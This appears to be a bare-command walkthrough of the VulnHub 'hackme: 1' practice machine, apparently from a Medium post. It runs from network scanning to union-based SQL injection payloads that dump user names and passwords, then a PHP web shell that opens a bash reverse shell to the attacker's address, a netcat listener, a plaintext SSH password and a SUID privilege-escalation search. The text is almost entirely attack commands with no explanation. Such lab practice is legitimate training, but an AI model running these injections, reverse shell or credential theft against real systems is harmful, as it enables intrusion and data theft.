VulnHub: hackme: 1

nmap -sn 192.168.60.128/24
nmap -Pn 192.168.60.129nmap -Pn -p1000- 192.168.60.129
nmap -sU -sV 192.168.60.129
nmap -A -p22,80 192.168.60.129
nmap --script vuln -p22,80 192.168.60.129
ssh 192.168.60.129
nikto -h http://192.168.60.129
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.129/ -x php,txt,html,sh,cgi -q
c
1' or 1=1--
1' or 1=1-- - 
1' union select 1-- -1' union select 1,2-- -
1' union select 1,2,3-- -
1' union select @@version,@@hostname,database()-- -
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()-- -
1' union select 1,group_concat(id,':',user,':',pasword),3 from users-- -
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.60.128/443 0>&1'");
rlwrap nc -lvp 443
id
python -c 'import pty;pty.spawn("/bin/bash");'
cd /var/www/htmlcat config.php
ssh 192.168.60.129password: hackme1qaz@WSX
cd /home/legacyls -la
./touchmenot
find / -perm -u=s -type f 2>/dev/null

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store